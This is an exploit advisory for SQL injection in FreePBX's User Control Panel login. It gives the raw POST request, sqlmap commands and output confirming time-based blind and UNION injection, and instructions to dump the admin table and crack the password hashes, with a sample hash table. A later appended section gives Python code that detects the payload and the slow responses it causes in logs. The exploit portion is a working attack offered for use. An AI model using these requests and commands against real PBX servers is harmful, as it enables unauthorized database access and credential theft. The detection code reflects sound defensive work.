# Exploit Title: [ SQL Injection ]
# Vendor: FreePBX
# Date: [2016-10-09]
# Exploit Author: [αԋɱҽԃ αмєяιcαη] ** Skype: AhmedAmerican_ **
# Vendor Homepage: [https://www.freepbx.org/]
# Tested Version: [ FreePBX 13.0.99 ** Other versions may also be affected ** ]
# This task needs sqlmap: https://github.com/sqlmapproject/sqlmap/tarball/master
The following vulnerability was detected through a manual POST request; the HTTP request and headers were:
---------------------------------------------------------------------------------
POST /ucp/index.php HTTP/1.1
Host: http://target ip/ or http://target ip:port/
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://target ip/ucp/
Content-Length: 103
Cookie: lang=en_US; PHPSESSID=igq9g1s6lurkpciojt4dabbu71; __utma=90705823.772463779.1476023139.1476023139.1476023139.1; __utmc=90705823; __utmz=90705823.1476023139.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Connection: keep-alive

token=1a543e82edd4d6a276ad0be4f1307822&username=&password=&email=&quietmode=1&module=User&command=login
---------------------------------------------------------------------------------
Basically, this release is affected by a POST-based SQL injection vulnerability in three parameters (username, password and email) of the User Control Panel (/ucp/).
Make sure the UCP is available before you start (example: http://TARGET IP/ucp/ or http://TARGET IP:PORT/ucp/).
Kindly be informed that each IP needs a new token in order for the POST request to be accepted.
---------------------------------------------------------------------------------
After installing the sqlmap tool in your root directory:
Proof of Concept:
root@American# cd SQLMAP
root@American:/SQLMAP# nano 1.txt
(and insert into it):
POST /ucp/index.php HTTP/1.1
Host: http://target ip/ or http://target ip:port/
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://target ip/ucp/
Content-Length: 103
Cookie: lang=en_US; PHPSESSID=igq9g1s6lurkpciojt4dabbu71; __utma=90705823.772463779.1476023139.1476023139.1476023139.1; __utmc=90705823; __utmz=90705823.1476023139.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Connection: keep-alive

token=1a543e82edd4d6a276ad0be4f1307822&username=&password=&email=&quietmode=1&module=User&command=login
File Name to Write: 1.txt [ Wrote 13 line ]
root@American:/SQLMAP# ./sqlmap.py -r 1.txt -p "username,password,email"

        sqlmap {1.0.10.19#dev}
        http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 20:26:50
[20:26:50] [INFO] parsing HTTP request from '1.txt'
[20:26:50] [WARNING] the testable parameter 'username,password,email' you provided is not into the GET
[20:26:51] [INFO] using '/home/American/sqlmap/output/i had remove target ip/session' as session file
[20:26:52] [INFO] resuming injection data from session file
[20:26:52] [WARNING] there is an injection in POST parameter 'username,password,email' but you did not provided it this time
[20:26:52] [INFO] testing connection to the target url
[20:26:53] [INFO] testing if the url is stable, wait a few seconds
[20:26:55] [INFO] url is stable
[20:33:13] [INFO] testing if POST parameter 'username,password,email' is dynamic
[20:33:14] [INFO] confirming that POST parameter 'username,password,email' is dynamic
[20:33:14] [INFO] POST parameter 'username,password,email' is dynamic
[20:33:14] [INFO] heuristics detected web page charset 'ascii'
[20:33:14] [WARNING] reflective value(s) found and filtering out
[20:33:14] [WARNING] heuristic (basic) test shows that POST parameter 'username,password,email' might be injectable
[20:33:15] [INFO] testing for SQL injection on POST parameter 'username,password,email'
[20:33:15] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:33:18] [INFO] POST parameter 'username,password,email' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="the")
[20:33:18] [INFO] heuristics detected web page charset 'CP949'
[20:33:21] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'MySQL'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y
[20:33:26] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[20:33:26] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (BIGINT UNSIGNED)'
[20:33:27] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[20:33:27] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (EXP)'
[20:33:27] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[20:33:27] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE, HAVING clause (JSON_KEYS)'
[20:33:28] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[20:33:28] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[20:33:28] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[20:33:28] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[20:33:29] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[20:33:29] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[20:33:29] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[20:33:30] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE, HAVING clause (FLOOR)'
[20:33:30] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[20:33:30] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[20:33:31] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[20:33:31] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[20:33:31] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[20:33:31] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[20:33:31] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[20:33:31] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[20:33:31] [INFO] testing 'MySQL inline queries'
[20:33:31] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[20:33:31] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[20:33:31] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP - comment)'
[20:33:32] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP)'
[20:33:32] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[20:33:32] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[20:33:32] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[20:33:43] [INFO] POST parameter 'username,password,email' appears to be 'MySQL >= 5.0.12 AND time-based blind' injectable
[20:33:43] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[20:33:43] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[20:33:44] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[20:33:45] [INFO] target URL appears to have 14 columns in query
[20:33:56] [INFO] POST parameter 'username,password,email' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
POST parameter 'username,email,password' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 88 HTTP(s) requests:
---
Parameter: username,password,email (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: token=1a543e82edd4d6a276ad0be4f1307822' AND SLEEP(30) -- &username=&password=&email=&quietmode=1&module=User&command=login rememberme=on ]
---
[20:33:59] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.0.12
[20:33:59] [INFO] fetching database names
[20:34:00] [INFO] the SQL query used returns 2 entries
[20:34:00] [INFO] retrieved: information_schema
[20:34:00] [INFO] retrieved: FreePBX
available databases [2]:
[*] FreePBX
[*] information_schema
[20:34:00] [INFO] fetched data logged to text files under '/home/American/.sqlmap/output/i had removed target ip'
[*] shutting down at 20:34:01
So now we are able to find the database. You can view the FreePBX database to find the admin table with its username, password and email columns, and then dump it,
e.g. with -D FreePBX -T admin -C username,password,email --dump. Once you have the dump, let sqlmap try to crack the password hashes, or crack them using any online cracking service.
Alternatively, you can run the command directly without saving the POST request to a file, with the following command:
./sqlmap.py -u "http://ip or ip:port/ucp/" --data="token=1a543e82edd4d6a276ad0be4f1307822&username=&password=&email=&quietmode=1&module=User&command=login" -p "username,password" --dbs
You can also set --level=3 --risk=3 in case you want to avoid stressing the server.
The result at the end will be:
+----------+----------------------------------+
| username | password                         |
+----------+----------------------------------+
| Admin    | 9dab701b830129f80a3a40a5280b944a |
| Saqisza  | 6sb84d072ba41784289c8fb2098458d0 |
+----------+----------------------------------+
Otherwise, post your own information that you want to log in with and wait until sqlmap has finished posting:
[token=27dfb08647231ad0ed08fd2bdab65fe1' AND SLEEP(30) -- username=American password=Letmego@ email=Ahmed.American@rocketmail.com rememberme=on ]
************************** SEE YOU ALL SOON αԋɱҽԃ αмєяιcαη *******************
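The defensive counterpart to the probing shown above, added here and not part of the original paste: a signature check over the UCP login POST body for the quote / AND SLEEP(30) / trailing-comment shape of the payload, and a latency check over access-log lines, since SLEEP(30) probes against /ucp/index.php leave roughly 30-second service times. The request bodies and log lines are constructed samples; the log format (Apache combined log with %D microseconds appended), the IP addresses and the e-mail domain are assumptions.

```python
import re
from urllib.parse import parse_qs

# Indicators of the injection shape shown in the advisory: a quote followed by a
# boolean operator, a SLEEP/BENCHMARK primitive, a trailing comment, or UNION SELECT.
SQLI_PATTERNS = [
    re.compile(r"['\"]\s*(and|or)\b", re.I),
    re.compile(r"\b(sleep|benchmark)\s*\(", re.I),
    re.compile(r"(--|#)\s*$"),
    re.compile(r"\bunion\b.+\bselect\b", re.I | re.S),
]
LOGIN_FIELDS = {"token", "username", "password", "email"}  # UCP login form fields

def suspicious_fields(body: str) -> dict:
    """Map each login field whose URL-decoded value matches an indicator to the patterns hit."""
    hits = {}
    for field, values in parse_qs(body, keep_blank_values=True).items():
        if field in LOGIN_FIELDS:
            for value in values:
                matched = [p.pattern for p in SQLI_PATTERNS if p.search(value)]
                if matched:
                    hits.setdefault(field, []).extend(matched)
    return hits

# Assumed log format: Apache combined log with %D (service time, microseconds) appended.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
                    r'\d{3} \S+ "[^"]*" "[^"]*" (?P<usec>\d+)$')

def slow_ucp_logins(log_lines, threshold_s=25.0):
    """Return (ip, seconds) for POSTs to /ucp/index.php served in >= threshold_s:
    the latency fingerprint of SLEEP(30)-style time-based blind probing."""
    out = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if m and m["method"] == "POST" and m["path"].startswith("/ucp/index.php"):
            secs = int(m["usec"]) / 1e6
            if secs >= threshold_s:
                out.append((m["ip"], secs))
    return out

# Constructed samples: the advisory's payload body, a benign login body, and three log lines.
INJECTED_BODY = ("token=1a543e82edd4d6a276ad0be4f1307822' AND SLEEP(30) -- "
                 "&username=&password=&email=&quietmode=1&module=User&command=login")
BENIGN_BODY = ("token=1a543e82edd4d6a276ad0be4f1307822&username=American&password=Letmego%40"
               "&email=user%40example.invalid&quietmode=1&module=User&command=login")
SAMPLE_LOG = [
    '203.0.113.5 - - [09/Oct/2016:20:33:13 +0000] "POST /ucp/index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0" 30148211',
    '203.0.113.5 - - [09/Oct/2016:20:33:45 +0000] "POST /ucp/index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0" 182334',
    '198.51.100.7 - - [09/Oct/2016:20:34:00 +0000] "GET /ucp/ HTTP/1.1" 200 2048 "-" "Mozilla/5.0" 41002',
]
```

Running suspicious_fields(INJECTED_BODY) flags only the token field (three patterns hit), the benign body yields an empty dict, and slow_ucp_logins(SAMPLE_LOG) returns the single 30.1-second POST from 203.0.113.5.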